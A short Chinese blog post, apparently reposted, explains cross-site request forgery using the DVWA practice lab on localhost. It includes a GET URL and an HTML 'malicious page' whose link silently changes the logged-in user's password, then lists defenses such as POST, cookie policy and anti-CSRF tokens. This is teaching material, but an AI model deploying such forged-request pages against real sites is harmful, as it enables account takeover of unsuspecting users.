码迷,mamicode.com
首页 > 其他好文 > 详细

简述CSRF请求跨站伪造

时间:2018-04-09 16:24:29      阅读:190      评论:0      收藏:0      [点我收藏+]

标签:csrf   请求跨站攻击   

首先什么是CSRF:


技术分享图片


如图:

    1,用户通过浏览器正常访问带有CSRF漏洞的网站。


        如我去访问http://127.0.0.1:8080/DVWA/login.php

        技术分享图片


        我们登录进去账号是:admin 密码是:password,找到一个修改密码的地方

        技术分享图片

        修改密码为123456,修改的url是:

        http://127.0.0.1:8080/DVWA/vulnerabilities/csrf/password_new=123456&password_conf=123456&Change=Change#

        技术分享图片

        

    2,我们构造恶意网站B将代码保存为index.html

<html>
	<head>
	
	<title>这是恶意网页</title>
	</head>
	
	<body>
	<h1>这是恶意网页<h1>
	<a href="http://127.0.0.1:8080/DVWA/vulnerabilities/csrf/?password_new=password&password_conf=password&Change=Change#">攻击</a> 
	
	</body>

</html>

        我们访问网站B:点击攻击

        技术分享图片

     

        我们可以看到密码被改了(改成了password)

        技术分享图片


防御:

   1.尽量使用POST,限制GET

   2.浏览器Cookie策略

   3.Anti CSRF Token




微信公众号:

技术分享图片


简述CSRF请求跨站伪造

标签:csrf   请求跨站攻击   

原文地址:http://blog.51cto.com/tdcqvip/2096090

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!